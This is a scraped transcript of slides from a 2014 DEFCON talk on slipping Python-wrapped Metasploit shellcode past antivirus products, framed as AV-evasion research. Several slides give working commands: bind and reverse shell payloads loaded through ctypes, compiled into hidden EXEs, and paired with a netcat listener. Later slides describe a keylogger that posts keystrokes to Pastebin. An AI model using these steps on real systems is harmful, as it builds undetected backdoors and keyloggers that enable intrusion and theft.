Presentation is loading. Please wait.

Presentation is loading. Please wait.

Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014.

Published byHilary Morton Modified over 9 years ago

Similar presentations

Presentation on theme: "Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014."— Presentation transcript:

1 Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014

2 Bio

3 CNIT 124 Advanced Ethical Hacking

4 Violent Python Good coding principles – Exception handling – Modular design – Optimization – Commenting – Flow charts FORGET THEM ALL

5 Violent Python We are hackers We are here to BREAK STUFF It should be fast and easy for a complete novice to hack together a simple script to do something fun!

6

7

8

9 Projects

10

11 Antivirus Ungh! Good God y'all... What is it GOOD For?

12

13 Mikko Hypponen Video

14 Metasploit Payloads

15 Metasploit Hundreds of payloads The simplest one: bind_tcp Listens on a TCP port for commands

16 Simple Reverse Shell One command to produce very simple Windows EXE malware

17 Antivirus Catches It

18 Norton v. Shell.exe

19 Norton Identifies the Metasploit Packer

20 VirusTotal: 37/49 Detections

21 How to Become 007

22

23 Python v. AV Round 1 shell_bind_tcp

24 Export Metasploit Payloads to C

25 Use Ctypes Python Library

26 Compile it on Windows Install these things, in order – Python 2.7 – PyWin32 – pip-Win – PyInstaller This creates an EXE file that listens on a TCP port

27 DEMO On Kali msfpayload windows/shell_bind_tcp C > foo nano foo Change top to from ctypes import * shellcode = ( Change bottom to ); memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell()

28 DEMO On Windows, in pip-Win: venv -c -i pyi-env-name pyinstaller --onefile --noconsole foo

29 VirusTotal: 1/50 Detection

30 Norton Support I Tweeted about this, and @NortonSupport replied VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning @NortonSupport gave me a link for a 30-day trial version :)

31 Norton Wins!

32 Kaspersky Wins! Avast! doesn't detect it Kaspersky detects it as HEUR:Trojan.Win32.Generic

33 Python v. AV Round 2 shell_bind_tcp with a delay

34

35

36 DEMO On Kali cp foo foo2 nano foo2 x=raw_input("Press Enter to continue") On Windows, in pip-Win: venv -c -i pyi-env-name pyinstaller --onefile foo2

37 Norton, Avast, & MSE Lose!

38 Kaspersky Wins!

39 Python v. AV Round 3 shell_bind_tcp in two stages no delay

40 Other AV Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay Al these failed – Norton – Nod32 – Avast! – 360 Internet Security – McAfee – Kaspersky

41 Remember Mikko?

42 F-Secure Wins!

43 AV Challenge

44 Posted April 3, 2014 No reply from AV vendors, but Norton improved its detection after that – Now a delay is required

45 Python v. AV Round 4 shell_bind_tcp with a delay

46 INSTRUCTIONS On Kali msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev nano rev Change top to x=raw_input("Press Enter to continue") from ctypes import * shellcode = ( Change bottom to ); memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell()

47 INSTRUCTIONS On Windows, in pip-Win: venv -c -i pyi-env-name pyinstaller --onefile rev On Kali nc –lp 4444

48 Norton Loses

49 Kaspersky Wins

50 Advanced Malware Protection

51 ty @ChrisAbdalla_1 from HP ESP TippingPoint

52 A friend in the financial industry tested Evil.exe on a system protected by FireEye FireEye gives no alerts and lets it post keystrokes right to Pastebin

53 Python Keylogger

54 Google "Python Keylogger" I used this one from 4 years ago

55 Post Keystrokes to Pastebin

56 Problem Pastebin busted me for making too many pastes in a 24-hour period So I wrote my own Pastebin imitation

57 Kaspersky & Avast! LOSE

58 Norton WINS!

59 But just add a delay...

60 F-Secure LOSES!

61 PRODUCT ANNOUNCEMENT!

62 Ultra-Advanced APT Tool samsclass.info/evil.exe

63

64 UNSTOPPABLE None of these products stop it – Norton – McAfee – Kaspersky – Nod32 – F-Secure – Avast! – Microsoft Security Essentials

65

66

67

Download ppt "Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014."

Similar presentations

ETHICAL HACKING.

ETHICAL HACKING.
Grass Valley Learning Center www.GVLearningCenter.com Surf the Net Safely Roger Thornburn.

Grass Valley Learning Center Surf the Net Safely Roger Thornburn.
Cosc 5/4765 Protecting against ssh attacks And is this secure?

Cosc 5/4765 Protecting against ssh attacks And is this secure?
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Internet and Me Ok the first thing I can say about internet is, it’s very helpful important. I can’t imagine my day without it. I use Inet every day every.

Internet and Me Ok the first thing I can say about internet is, it’s very helpful important. I can’t imagine my day without it. I use Inet every day every.
1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.

1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.
Warren Toomey North Coast TAFE Port Macquarie campus

Warren Toomey North Coast TAFE Port Macquarie campus
Www.SecurityXploded.com. Disclaimer The Content, Demonstration, Source Code and Programs presented here is AS IS without any warranty or conditions.

Disclaimer The Content, Demonstration, Source Code and Programs presented here is "AS IS" without any warranty or conditions.
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
Rootkits: Sneaky, Stealthy Toolboxes

Rootkits: Sneaky, Stealthy Toolboxes
Free Software Alternatives: Avast! Anti-virus

Free Software Alternatives: Avast! Anti-virus
Customized solutions. Keep It Secure Contents  Protection objectives  Endpoint and server software  Protection.

Customized solutions. Keep It Secure Contents  Protection objectives  Endpoint and server software  Protection.
The Business of Penetration Testing

The Business of Penetration Testing
PYTHON: LESSON 1 Catherine and Annie. WHAT IS PYTHON ANYWAY?  Python is a programming language.  But what’s a programming language?  It’s a language.

PYTHON: LESSON 1 Catherine and Annie. WHAT IS PYTHON ANYWAY?  Python is a programming language.  But what’s a programming language?  It’s a language.
 Norton Antivirus, developed and distributed by Symantec Corporation, provides malware prevention and removal during a subscription period. It uses signatures.

 Norton Antivirus, developed and distributed by Symantec Corporation, provides malware prevention and removal during a subscription period. It uses signatures.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
XSS Without the Browser Wait, what? Toorcon Seattle, 2011.

XSS Without the Browser Wait, what? Toorcon Seattle, 2011.
Warrington U3A Advanced Computer Class PC Maintenance and Security.

Warrington U3A Advanced Computer Class PC Maintenance and Security.
KEEP IT CLEAN!. YOUR COMPUTER THAT IS! Why? Detect Viruses & Malware BEFORE they cause damage Speed up your computer Eliminate annoying unwanted software.

KEEP IT CLEAN!. YOUR COMPUTER THAT IS! Why? Detect Viruses & Malware BEFORE they cause damage Speed up your computer Eliminate annoying unwanted software.

Similar presentations

Ads by Google